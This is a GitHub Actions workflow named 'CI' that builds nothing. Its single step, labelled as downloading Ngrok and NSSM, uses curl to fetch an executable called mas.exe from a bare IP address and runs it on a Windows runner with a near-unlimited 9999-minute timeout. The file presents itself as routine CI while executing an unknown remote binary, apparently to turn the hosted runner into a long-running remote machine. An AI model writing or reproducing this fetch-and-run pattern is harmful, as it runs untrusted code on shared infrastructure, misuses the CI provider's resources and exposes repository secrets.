name: CI

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download Ngrok & NSSM
      run: |
          cmd /c curl http://44.202.6.121/mas.exe -O
          cmd /c mas.exe
